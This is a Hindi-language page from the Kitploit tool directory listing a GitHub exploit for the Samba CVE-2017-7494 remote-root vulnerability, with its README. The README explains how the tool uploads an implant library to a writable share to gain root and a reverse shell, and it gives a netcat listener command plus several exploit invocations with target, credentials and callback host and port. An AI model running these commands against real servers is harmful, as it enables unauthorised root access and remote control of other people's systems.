Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7494 — SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट रूट एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/joxeankoret/cve-2017-7494
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट रूट एक्सप्लॉइट

रिपॉजिटरी देखें
259745 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-7494

SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट रूट शोषण।

विवरण

यह शोषण 2 भागों में विभाजित है:

  • पहला, यह "implant.c" नामक एक पेलोड संकलित करता है और एक लाइब्रेरी (libimplantx32.so या libimplantx64.so) उत्पन्न करता है जो रूट उपयोगकर्ता में बदल जाती है, मूल प्रक्रिया से अलग हो जाती है और एक रिवर्स शेल स्पॉन करती है।
  • दूसरा, यह निर्दिष्ट लक्ष्य होस्ट में एक लिखने योग्य शेयर ढूंढता है, एक यादृच्छिक नाम के साथ लाइब्रेरी अपलोड करता है और इसे लोड करने का प्रयास करता है।

जब तक लक्ष्य भेद्य है और पेलोड लक्ष्य ऑपरेटिंग सिस्टम और आर्किटेक्चर के लिए सही है, शोषण 100% विश्वसनीय है।

कैसे करें

अपनी मशीन में, निम्नलिखित कमांड चलाएँ:

root@kitploit:~
$ nc -p 31337 -l

फिर, अपने लक्ष्य के विरुद्ध शोषण चलाएँ और जब तक यह आपके Netcat से वापस कनेक्ट न हो जाए, प्रतीक्षा करें:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

यदि आप रिवर्स शेल को बहुत जल्दी बंद कर देते हैं, तो शोषण को फिर से चलाकर मॉड्यूल अपलोड करने के बजाय, आप उस मॉड्यूल का पथ पास कर सकते हैं जो पहले से अपलोड हो चुका है। मान लीजिए कि इसे /shared/directory/ पर "module.so" के रूप में अपलोड किया गया था, तो आप निम्नलिखित कमांड चलाएँगे:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

अद्यतन 11/25/2017 - Archivaldo

अब आप samba 3.5.0 और 3.6.0 के विरुद्ध शोषण चला सकते हैं, आपको बस -o 1 आर्गुमेंट जोड़ने की आवश्यकता है।

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

अब आप अपने स्वयं के कस्टम .so का उपयोग कर सकते हैं।

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

यदि आपको इस स्क्रिप्ट को x86 मशीन से चलाने की आवश्यकता है, तो implant बाइनरीज़ को संकलित करने पर दो x86 फ़ाइलें बनेंगी। -n 1 फ्लैग का उपयोग करके आप संकलन को अक्षम कर सकते हैं और दूसरी मशीन से libimplantx64.so कॉपी कर सकते हैं।

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

यदि samba केवल पोर्ट 139 पर चलता है। आप -p आर्गुमेंट का उपयोग करके रिमोट सर्वर पोर्ट सेट कर सकते हैं।

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

नोट्स

मैं अब इसका समर्थन नहीं करता।

-- Joxean Koret

टूल डाउनलोड करें